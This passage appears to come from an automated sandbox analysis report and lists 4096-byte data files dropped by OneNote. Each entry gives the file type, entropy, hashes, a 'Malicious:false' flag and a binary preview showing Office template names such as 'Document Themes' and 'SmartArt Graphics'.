                                                                                                                                                                                                              Preview:2...>................................................................................................................................................................................................................J..VQ/q_.[q......[q....E...O.H..[q....E...O.H..[q........J..VQ/q_...............................................................................................!....\......N....................................................[q...c..,.........................4..1...(...(... ...D.o.c.u.m.e.n.t. .T.h.e.m.e.s..............1... ..$ ...D.o.c.u.m.e.n.t. .T.h.e.m.e.s.................t.G....]l.%....N...^...............................................................................................................t.G....]l.%............................................................................................................................................................................................................................................................
                                                                                                                                                                                                              Process:C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):4096
                                                                                                                                                                                                              Entropy (8bit):0.47523041153537415
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:6:NTcpVs7bs4SAIiglyLx8Olu3af83errw1E+d3ern:VcpVs744QTV38zrrQEPrn
                                                                                                                                                                                                              MD5:E51AE4260AF40E96D87B3824DDD443C8
                                                                                                                                                                                                              SHA1:87D16A221B82DC064C453243AF392A605050706F
                                                                                                                                                                                                              SHA-256:DE230C950658AFD6807C97F0A6382776F954D09C2955A515FB09DE016575BAC2
                                                                                                                                                                                                              SHA-512:FAEA7F0989941FC43088F4CB7EEFC69E8511415CD80989BD541B6A3B21FCC84B3FCB21E47748942B1F7E674B209828DF08FCE721CED89F4D41DAF756A501ABBC
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:2...>...........~.......................................................................................................................................................................................T.......T......I..0..y2.........................T......I..0..y2.T....................................................T.......T...................................................T.......T..\..............................................................4..1...(...(.......1.0.3.3.........1.......1.0.3.3.....].0.%C..H..+......N...^.............................................................................................................].0.%C..H..+..............................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                              Process:C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):4096
                                                                                                                                                                                                              Entropy (8bit):0.7324163113789234
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:6:K0nCttQp43ItdbZ434dbv2f9ERJByax8felBkls0CBD7elBkls031Ww1EZ:KUCtSwIU6keIWBD7eIWc1WQEZ
                                                                                                                                                                                                              MD5:1C419EF5457C7E6D5C16666842944E37
                                                                                                                                                                                                              SHA1:3E324231D9F8F72E8D0FE0402550EC85C6C8ADB4
                                                                                                                                                                                                              SHA-256:85CB7C98E2B318EC223AF450824F8963FB55B4E6609A5DFA28CD142C6CCF28EB
                                                                                                                                                                                                              SHA-512:203B2DE7165ABCA857097442AB6A7D644CF195818D0206767ED061C88E3204CC9EAF6BB5A20CC702989F0F0A6787F7634281A1F4495DB145E11ED95A8A8CD0BE
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:2...>...................................................................................................................................................................................................W......W...0J..4..1..:.......:..l..K._..0...W...0J..4..1..W..:..l..K._..0...:................................:.......:...................................................:...."..:..\....:..N....................................................W...c..,.........................4..1...(...(...$...S.m.a.r.t.A.r.t. .G.r.a.p.h.i.c.s..............:....1... ..$$...S.m.a.r.t.A.r.t. .G.r.a.p.h.i.c.s.........G.m....O.j@.~.Q.....N...^...........................................................................................................G.m....O.j@.~.Q.....................................................................................................................................................................................................................................................
                                                                                                                                                                                                              Process:C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):4096
                                                                                                                                                                                                              Entropy (8bit):0.4803865188299943
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:6:NTcF/DmKg+kZK+JsSxuJyLx8Olu3af3nqUlxmw1ESmnqUl/0:VcFb9ktsSoJV383NjmQETNa
                                                                                                                                                                                                              MD5:6C5273F9A5422699E1A205265FC8AC76
                                                                                                                                                                                                              SHA1:BD07BBC1E5337CEE2F597898FFA8E9B6DA478F03
                                                                                                                                                                                                              SHA-256:F421C07D61E3641F59FC7A07725AAE966C3ED4C6A5133CE46646F601EA1A0A91
                                                                                                                                                                                                              SHA-512:DA0C41C6698F1DA8C637C3340FCF9A0CE8DA5BE04E719567D235BFAC40BC44D7C968241C6D0A7F1A2E57E2C7C03BC1E6EC65B48506986076366A1017773724E8
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:2...>...........~.......................................................................................................................................................................................^.......^...c..M................................^...c..M........^....................................................^.......^...................................................^.......^..\..............................................................4..1...(...(.......1.0.3.3.........1.......1.0.3.3...B.....$E.WC.HkE....N...^...........................................................................................................B.....$E.WC.HkE............................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                              Process:C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):4096
                                                                                                                                                                                                              Entropy (8bit):0.6421051349657183
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:12:UeEss/ZJy3Sb/qnkNYKQQnkNY2FcQEt2:UhyG/qkNbQQkNVFcR
                                                                                                                                                                                                              MD5:DC09A8416E6EC4677C543925B1DBE0CE
                                                                                                                                                                                                              SHA1:9E906C114B8831F9FF485B23ACC8039283541B24
                                                                                                                                                                                                              SHA-256:5992FCD59B1522EA69181AA263B056A52B617EE0AB64F5EAA50B82283E659B21
                                                                                                                                                                                                              SHA-512:22DD0739973ED7F1EBDA4A3D9EE3EC6AFA7389FFE43971DFC787D1D2137D798941F60DD94570500BFB0B88CF0563315B0CFDBA64F35F881E02ED04FE3758F079
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:2...>...................................................................................................................................................................................................5.......5...B<.F.{/.]c4.........................5...B<.F.{/.]c4.5....................................................5.......5...................................................5...."..5..\..............................................................4..1...(...(...D...W.o.r.d. .D.o.c.u.m.e.n.t. .B.i.b.l.i.o.g.r.a.p.h.y. .S.t.y.l.e.s...............1...D...W.o.r.d. .D.o.c.u.m.e.n.t. .B.i.b.l.i.o.g.r.a.p.h.y. .S.t.y.l.e.s..........q}J.l.E...........N...^............................................................................................................q}J.l.E...................................................................................................................................................................................................................................
                                                                                                                                                                                                              Process:C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):4096
                                                                                                                                                                                                              Entropy (8bit):0.7895049366358351
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:6:+wxRXEYuThfcxuVem2NcuT8Vh048NCOvx80cHnD2nHlXDj5DwcHnD2nHlEr37w1b:+wfEYu9zVexcXVQpsD4/wsD4CXQEmx
                                                                                                                                                                                                              MD5:0269F2C4B8F4A9B41F4CBA3C63F72C55
                                                                                                                                                                                                              SHA1:8D11760170422E148CDBD0EFBE51A1C50CF8F3AA
                                                                                                                                                                                                              SHA-256:06C15E0FF51A631CFC0C4434D6F661879413C652B314EB8EB3DD77B8466853DE
                                                                                                                                                                                                              SHA-512:EA88845A01A47E1C472EA24BA7547ED2C3E8E4AD50404BD30C2B6F7872AA4D23602C3BFFD0C23AF307538AE8A69065A47BFAA0DAA8EB9AD9A167D0849FADEE78
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:2...>...................................................................................................................................................................................................ghC.....ghC.B.L..h.U.............%2.sK..........%2.sK...........ghC.B.L..h.U..ghC...............................................................................................#.....\.......N....................................................ghC..c..,.........................4..1...(...(...<...W.o.r.d. .D.o.c.u.m.e.n.t. .B.u.i.l.d.i.n.g. .B.l.o.c.k.s...................1... ..$<...W.o.r.d. .D.o.c.u.m.e.n.t. .B.u.i.l.d.i.n.g. .B.l.o.c.k.s..........U.$...M..I..I.....N...^............................................................................................................U.$...M..I..I.....................................................................................................................................................................................................
                                                                                                                                                                                                              Process:C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):4096
                                                                                                                                                                                                              Entropy (8bit):0.4833162063299943
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:6:NTcu9YVXEe+gOimeyLx8Olu3afHyrw1EI8yn:VcV19rOkV38HoQEI80
                                                                                                                                                                                                              MD5:AA0B97DAD03630785F04676C8A179F3A
                                                                                                                                                                                                              SHA1:7CD8419B38CFC7B46621E7804F63C7B371F09A73
                                                                                                                                                                                                              SHA-256:2EC39F3F51F37428C0C3539C1805ACF023370C0AE8D0C350E1BAB1BF75E47D55
                                                                                                                                                                                                              SHA-512:9519567C4F01D78DF7E360AF1E78E07C20E56420C502B0F1CBCBC943664B9A96CEA426F6CDD3F0E80C00E5056A3553955772241F245D86859FB28055F9E0A523
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:2...>...........~.......................................................................................................................................................................................~Sp.....~Sp.N.?K..O}Y.,.........................~Sp.N.?K..O}Y.,.~Sp..................................................~Sp.....~Sp.................................................~Sp.....~Sp\..............................................................4..1...(...(.......1.0.3.3.........1.......1.0.3.3...X'...oD.s...3. ....N...^...........................................................................................................X'...oD.s...3. ............................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                              Process:C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
                                                                                                                                                                                                              File Type:big endian ispell hash file (?), 8-bit, no capitalization, 26 flags
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):4096
                                                                                                                                                                                                              Entropy (8bit):1.4256912059438842
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:24:RZ5DyM/C+CJPD98TpootAjGwkJQhecEah:p5Dibm1ooejNzE
                                                                                                                                                                                                              MD5:96D83992D2A883D069F52A05DA4ACF31
                                                                                                                                                                                                              SHA1:7AD6AB61BB5FC36E32E5BB004D0D78B7384C5366
                                                                                                                                                                                                              SHA-256:C447E4D31D1094897A2B22B40A6F08E9D4EB30043AC414E22048838F7822E8A7
                                                                                                                                                                                                              SHA-512:6CCF4424250EBF1D68D360D8B1026E907D99F503D0E882DA3C103F3643B1BFA477A596885307BCAC84CB0E2BB070D3DA760CD5E00D14D418EDA0FC59889C0CF4
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:........ .............................?..................................................................................................................................................................8E......8E-...G..m...Pp@.......@..;2.N..p...n.Y0.Q..<@..{[t.Y.Y0.._..5&E...zS..O_....8E-...G..m...Pp.8E...........8E......8E..................................................8E..@...8E\.....8EN.....8EN.)...8EN.9...8EN.>..........................@....c..,.........................4..1...(...(.......U.s.e.r.........8E..1... ..$....U.s.e.r...........Y0......Y0.Q..<@..{[t.Y.@.......@..;2.N..p...n.2................................8E.@...................................._....c..,....................8E..8E..1... ..$....U.s.e.r.......`.......`.....N.$K...o._......._..5&E...zS..O@..;2.N..p...n.@...`.....N.$K...o.`...........................>................8E-...G..m...Pp.........................................`....c..,....................8E..8E..8E..1... ..$....U.s.e.r...................
                                                                                                                                                                                                              Process:C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):4096
                                                                                                                                                                                                              Entropy (8bit):0.7234913545987757
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:12:Kt8lElh1HtSAuSAbX96XnqT9XlqKQEO6y:iZSFSe6XM9sKV
                                                                                                                                                                                                              MD5:E155A3BD45D6C81C1BCBBE319F547134
                                                                                                                                                                                                              SHA1:D8613C38FA98327AEA93917E722BD5ECF45D32BC
                                                                                                                                                                                                              SHA-256:7AABEF909AD2A963212B7AADC1A9EC339B2E5FFC40E579F0C906FA8BFCE4A744
                                                                                                                                                                                                              SHA-512:DC53AB016256AE9E93B364FFB61357DCEE11E4C83932C27F985356E260CAD18CC17788997120EE3CA2079C5CAF51CBB281C91A291F363486D48BBCC1FC4C6AD2
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:2...>...................................................................................................................................................................................................).......)...8..G.....&.P"......."...t..B.0.dKy6g"...t..B.0.dKy6g"...)...8..G.....&.P)................................).......)...................................................)....!..)..\....)..N...................................................."....c..,.........................4..1...(...(... ...D.o.c.u.m.e.n.t. .T.h.e.m.e.s..........)....1... ..$ ...D.o.c.u.m.e.n.t. .T.h.e.m.e.s...............2(.@.M.......t....N...^.............................................................................................................2(.@.M.......t............................................................................................................................................................................................................................................................
                                                                                                                                                                                                              Process:C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):4096
                                                                                                                                                                                                              Entropy (8bit):0.4780647964168284
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:6:NTcBDXAs6uXsdXWyXugJeyLx8Olu3afNNlwww1EBNlwM:VcBDQs6GsJW6UV38iwQEmM
                                                                                                                                                                                                              MD5:FCAD9A3BAB53C854AE1D734ABAA0884C
                                                                                                                                                                                                              SHA1:751DE9371A62B33A23C0A3B2199B69A984AD1751
                                                                                                                                                                                                              SHA-256:D1108AF8E56925852D7BE3B1C985299B0F20492BE68DB1DD20E168CA178DD8B8
                                                                                                                                                                                                              SHA-512:E8312DBF7C79C77F1FC902C4A43519A031F56BFA08893B8D9FC3BD65E288CC07A8F2F92AA36C7D50FEA01E9CE1344B7C2E399D1F3B81A9AF7BFD888BF478EE99
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:2...>...........~.......................................................................................................................................................................................2s......2s....I...A...........................2s....I...A...2s...................................................2s......2s..................................................2s......2s.\..............................................................4..1...(...(.......1.0.3.3.........1.......1.0.3.3.....1O7h.K..O..K......N...^.............................................................................................................1O7h.K..O..K..............................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                              Process:C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):4096
                                                                                                                                                                                                              Entropy (8bit):0.7331743113034986
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:12:KUCBQR5MX3t1lkueIWxD7eIWc1z4EwQEy4E/0:KUKEeXd1iuAD7R4rG4k
                                                                                                                                                                                                              MD5:38659B63858064AEE8388C06E5D5013E
                                                                                                                                                                                                              SHA1:53ED5098A99154F62A886E2011341E48530203E3
                                                                                                                                                                                                              SHA-256:6125F441E1640B662C14FC214D0A9F1B6B225C4B1C5C6307E52F8EC349DDFDEF
                                                                                                                                                                                                              SHA-512:FFA734BA7DA6B5832A68DE2B154F8407E19452807104B2926BAD7E3BDADB1C17035D466AA3D80A659632C937C472DBED9E1B38924E545BA861A6CBD858FD0A68
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:2...>.....................................................................................................................................................................................................4.......4.3.{H..%}&..B.8.......8.. M.J.z'u.. (..4.3.{H..%}&..B..4..8.. M.J.z'u.. (.8.................................4.......4...................................................4.."....4\......4N.....................................................8...c..,.........................4..1...(...(...$...S.m.a.r.t.A.r.t. .G.r.a.p.h.i.c.s................4..1... ..$$...S.m.a.r.t.A.r.t. .G.r.a.p.h.i.c.s.........r..V.eD...c..)....N...^...........................................................................................................r..V.eD...c..)....................................................................................................................................................................................................................................................
                                                                                                                                                                                                              Process:C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):4096
                                                                                                                                                                                                              Entropy (8bit):0.48270824124316003
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:6:NTcUR/2FRgl/lqtlwXeyLx8Olu3afEy4opw1EOGP+y4oJ:VcUpEml/lIlwXeV380mQEhaW
                                                                                                                                                                                                              MD5:4D17AB59BEC6484170297FAF74B91871
                                                                                                                                                                                                              SHA1:E04E22341A9912990EF87F061729292702E64720
                                                                                                                                                                                                              SHA-256:F976683BD2ABBC400C06FC4F7A10BFF91318500304DA24B848C7384F95820E5D
                                                                                                                                                                                                              SHA-512:D7EFD3B02BB1FA3077E3FC497097292BCFEE81F579E3D8CE74A3AE78DB96498285A00CF94790CFC10792299FE4A1489B15452BBD062D5F9C9E6870F263BBC026
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:2...>...........~....................................................................................................................................................................................................l.J..Z...+..............................l.J..Z...+.............................................................................................................................\..............................................................4..1...(...(.......1.0.3.3.........1.......1.0.3.3.....*..7hK..i..y.,....N...^.............................................................................................................*..7hK..i..y.,............................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                              Process:C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):4096
                                                                                                                                                                                                              Entropy (8bit):0.6420427423505781
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:6:UWBEEelFVu3K/0Sl0MbELx88cbrMkq2Sz1MQQcbrMkq2Sz1pXaYw1EcrXak:UeEEejMhSonkNYKQQnkNYHlQEcrN
                                                                                                                                                                                                              MD5:238CE97FF8F6DBC3D8187A553BD9752B
                                                                                                                                                                                                              SHA1:81770306FE9C23FD0162B033F0611894D3121F0A
                                                                                                                                                                                                              SHA-256:AE5ABADC2EDD6560015CD6D7E814ADC9EA5F4CB69883F63C60D21733E6859A66
                                                                                                                                                                                                              SHA-512:E620E63CF0C2006E7E3B3FFBBC1FD403598B54455EDC8595369BAE2632617CC8DD3AC1395A732CF27926796087233FBD2FCF47F5181AAA17A476D509EBC6D06A
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:2...>...................................................................................................................................................................................................3x......3x..g..F.$..b.\.........................3x..g..F.$..b.\.3x...................................................3x......3x..................................................3x..."..3x.\..............................................................4..1...(...(...D...W.o.r.d. .D.o.c.u.m.e.n.t. .B.i.b.l.i.o.g.r.a.p.h.y. .S.t.y.l.e.s...............1...D...W.o.r.d. .D.o.c.u.m.e.n.t. .B.i.b.l.i.o.g.r.a.p.h.y. .S.t.y.l.e.s............0.=.D.r.?.T......N...^..............................................................................................................0.=.D.r.?.T..............................................................................................................................................................................................................................
                                                                                                                                                                                                              Process:C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):4096
                                                                                                                                                                                                              Entropy (8bit):0.7863096374167515
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:6:+wxRXEi/+pc4vPauqc4vPiO+GMl0mcehIx80cHnD2nHlXtnWldwcHnD2nHlENHcr:+wfEjcLcxO+GXsD4TnWnwsD4CKyQE7q
                                                                                                                                                                                                              MD5:481580A0CB0F1AA082A2E79484D2C2D0
                                                                                                                                                                                                              SHA1:41AF8A7C3AEA1D8B6F18EB3BC4505FD218A55B08
                                                                                                                                                                                                              SHA-256:45AC1F99B32C6F83CA172F30ECE7217A71EAC669E697FF8AC585AB6B4B89301E
                                                                                                                                                                                                              SHA-512:CDF82A654DE829BF9E6A6B84190FBC979781FA9FF8F74C615AD3B9387A621BCB34BCF986AEA4B696ED8362BDED144C4B9C54BBEDB578A3FF0289D4D695CA960E
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:2...>....................................................................................................................................................................................................J.......J....5D.e.4.....i.......i..a(F..dJ.V0.J....5D.e.4....J....i..a(F..dJ.V0..i................................i.......i...................................................i..#....i\......iN.....................................................J...c..,.........................4..1...(...(...<...W.o.r.d. .D.o.c.u.m.e.n.t. .B.u.i.l.d.i.n.g. .B.l.o.c.k.s................i..1... ..$<...W.o.r.d. .D.o.c.u.m.e.n.t. .B.u.i.l.d.i.n.g. .B.l.o.c.k.s...........".^.9H.4/.?.,(....N...^.............................................................................................................".^.9H.4/.?.,(....................................................................................................................................................................................................
                                                                                                                                                                                                              Process:C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):4096
                                                                                                                                                                                                              Entropy (8bit):0.4777403822425683
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:6:NTcQZaLw/akXXk/dRlJlyLx8Olu3afwe1Zlcw1Eh1XlK:VcQYLwikXwvrV38wCbcQEPX0
                                                                                                                                                                                                              MD5:EA8F396262EDACD6216E821D951EC473
                                                                                                                                                                                                              SHA1:66857BB743602B589DA95648AF08D39000C4A620
                                                                                                                                                                                                              SHA-256:03C01F454BA8A14330024AE1EDAAEC2A82452153536A96F3DEAD5374BF13D2A2
                                                                                                                                                                                                              SHA-512:D42CC55D0A3C010AF942229E80E82230AF22EF2FE0FA396C669CBD51640E8EBACB3642D4854B24D94E92C33C061CCA5C50E9BAF6A02ECDF88EC1FCAF25E11DA4
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:2...>...........~..................................................................................................................................................................................................P...C..9'..d...........................P...C..9'..d............................................................................................................................\..............................................................4..1...(...(.......1.0.3.3.........1.......1.0.3.3...%{}.Ot.F.:.t.......N...^...........................................................................................................%{}.Ot.F.:.t...............................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                              Process:C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):4096
                                                                                                                                                                                                              Entropy (8bit):1.009518182117983
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:12:DKKOkZkFOEYXDwVT1AOkBNb5r7ZMNwOE8DQE9P:DboVmFr7ZjOE8DJ
                                                                                                                                                                                                              MD5:C23A30FDE3B68C99E2CD6904E4B2C32B
                                                                                                                                                                                                              SHA1:BD30BDE85F735E0C6E0D2689FD44D2059BD6B7C7
                                                                                                                                                                                                              SHA-256:8B2DAA6B9309B10381DF06BD6AF0A20F02FAB97892372F0356B01738BB142443
                                                                                                                                                                                                              SHA-512:52C5EE44663E7706974F293AD819757935CA764CE7BA4D0FBD4453B3ED35D5C0120D0F51848A151E3492EF9E5A51D5E789250597E84B978E49AD8CAF96FDA366
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:....>..........................?......?..................................................................................................................................................................DP......DP..B.%*^.^...!.......!..lqF.......DP..B.%*^.^...DP..!..lqF.......!..d...U.N..Yiz:..d.............!.......!...................................................DPN.(...!...-...!.\......................................................4..1...(...(.......L.i.v.e.C.o.n.t.e.n.t...................DP.. ..$...........!.......!..lqF......d.......d...U.N..Yiz:..2................................DP......................................d....c..,....................DP.. ..$p................nO...&..............DP.. ..$p...............?.@.\.q6.........%.....C.0$.o..\....N...^...........................................................................................................%.....C.0$.o..\....................................................................................
                                                                                                                                                                                                              Process:C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
                                                                                                                                                                                                              File Type:OpenPGP Secret Key
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):4096
                                                                                                                                                                                                              Entropy (8bit):0.9841489332485079
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:12:BKKQ83TuWATCfJS15ENWQ0ZfsQ5QEc20:nDHgCJJAQkkQ5g2
                                                                                                                                                                                                              MD5:C42D6F044D16A5432319F21B3314354F
                                                                                                                                                                                                              SHA1:4E02BFD386243E5C32C21C1E5029F9FAB8A8DB68
                                                                                                                                                                                                              SHA-256:B36EFD1220BE59F0DFDA42876B904B36B0F529BF891412FACECBF03CADC4D620
                                                                                                                                                                                                              SHA-512:BB5C58FBC56C30392D373BD7D753C88847C27F11F5BEAF0266FEA576A40255BD736E497C468917E9263B648DF551FF8AB30069BDDD121042B5709D5F252425DA
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:....>.............................?...?..............................................................................................................................................................................R^J.WiM................T,.D.B..P...^.M.h.C.D`..+..^.M.....T,.D.B..P...........R^J.WiM..................................................................................,.....\.......N.......N.)............................................4..1...(...(.......1.6.............................c..,........................ ..$..........^.M.....^.M.h.C.D`..+.............T,.D.B..P...2........................................................................^.M..c..,............................ ..$.................... ..$p..............0.^.E..\._G.............a..|~O.u./xo.-....N...^............................................................................................................a..|~O.u./xo.-....................................................................................
                                                                                                                                                                                                              Process:C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
                                                                                                                                                                                                              File Type:big endian ispell hash file (?), 8-bit, no capitalization, 26 flags
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):4096
                                                                                                                                                                                                              Entropy (8bit):1.5820121577250665
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:24:4DVra+Wo54T1R3GWJQRJoll9ljMz0erle:QWRT1VhOXtle
                                                                                                                                                                                                              MD5:A14F2271199C55D3DF1EAC68EC8ABF10
                                                                                                                                                                                                              SHA1:05993119B2F51D64F77632976E72B87F8ADC1F0A
                                                                                                                                                                                                              SHA-256:599B1D390BE05D75999F7A24566A7D9F952B366BF9A9106074F8F2250ACE05A2
                                                                                                                                                                                                              SHA-512:64A4F137C4E7D60B066D5312F36A4310302336D990C5BE601373965B3177669F622BA3F184E1857CE7F2C56B00482E4CB56F9520D6A48720AE3215A9CB909DD1
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:........0..............................................................................................................................................................................................................B..P..................rO.n..t`9........B..P.......z...h(.D.X1..*3.z.........rO.n..t`9z..............................................................................C.....\.......N.......N.).....N.8.....N.?............................4..1...(...(.......M.a.n.a.g.e.d......................z....c..,........................ ..$..........z.......z...h(.D.X1..*3...............rO.n..t`9.2...................................z.........................................c..,............................ ..$..................t..K..`.T.................rO.n..t`9.....t..K..`.T...........X..L.ofWW.............rO.n..t`9z........>...............z...h(.D.X1..*3...............................................c..,................................ ..$......................X..L.ofWW.................rO
                                                                                                                                                                                                              Process:C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):4096
                                                                                                                                                                                                              Entropy (8bit):0.7659880616595501
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:6:bE9M0iV2Gdc0ieg3tay2HILx8CAXCV2Lk/s1dPl/iHUOqw1E3UOS:bE9MV2GiT9arIYXdk01ddqHUFQE3Ut
                                                                                                                                                                                                              MD5:D1E986B500ACBD5A56272BCDDDD68F8D
                                                                                                                                                                                                              SHA1:AEEFAF3A677D22FC9DB8994FFFDA4436CE886F86
                                                                                                                                                                                                              SHA-256:EC726E170E9A2222765DB486227E95A63A7F5077CBE0342387DFC4199DBD3429
                                                                                                                                                                                                              SHA-512:217A067893CAA7F227E62804D7AF8B3EE7520063C974E13E5DB1A01F1F9C231120EB55846C033DA8A297FA78440DEF28524F7C477FF29B956A54AB7A0868859E
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:2...>..............................................................................................................................................................................................................7m.&C.]....2>......2>...K.D.A.$.....7m.&C.].........2>...K.D.A.$...2>...............................................................................................#.....\.......N. ....................................................4..1...(...(... ...D.o.c.u.m.e.n.t. .T.h.e.m.e.s.......................2>..c..,........................ ..$.................... ..$p...........!.e..d2F......p..........s..yE.+J.W:......N...^..............................................................................................................s..yE.+J.W:..............................................................................................................................................................................................................................................
                                                                                                                                                                                                              Process:C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):4096
                                                                                                                                                                                                              Entropy (8bit):0.5230478487912221
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:6:jhzckb4czAtWxi+eyLx8Olu346s5PrZmw1E9HPrX0:jRckbfTxreV3fs5PrYQE9HPrX0
                                                                                                                                                                                                              MD5:961FA851152EC4A3EB777E90ACA0B1EC
                                                                                                                                                                                                              SHA1:8F2033600E95C4EF932273F2860B68837C41D49F
                                                                                                                                                                                                              SHA-256:B9AA5F39375E60D0AD72EF3AF6879A9CCE050B9E72EDFF99C529ED19B3E63EA3
                                                                                                                                                                                                              SHA-512:71D95DD501B1FB5150CDF951C3A4155B2E44B2A1D064303D1C287FD4190045C92039092C333FF38735EE71658A03187759436051AAC20C14F26411522AD25E5E
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:2...>..................................................................................................................................................................................................................N...@..*................................N...@..*.............................................................................................................................\..............................................................4..1...(...(.......1.0.3.3.................p.........P.D~zF.i...."G...............&E.*z........N...^................................................................................................................&E.*z........................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                              Process:C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):4096
                                                                                                                                                                                                              Entropy (8bit):0.7670811242781124
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:12:D0CdMSTv0WA5bVtseIWHw1S1NMdVYQEPk:Q7Sr5w62wEM4
                                                                                                                                                                                                              MD5:CA2803BA9D6E8E355376BD4D493A0309
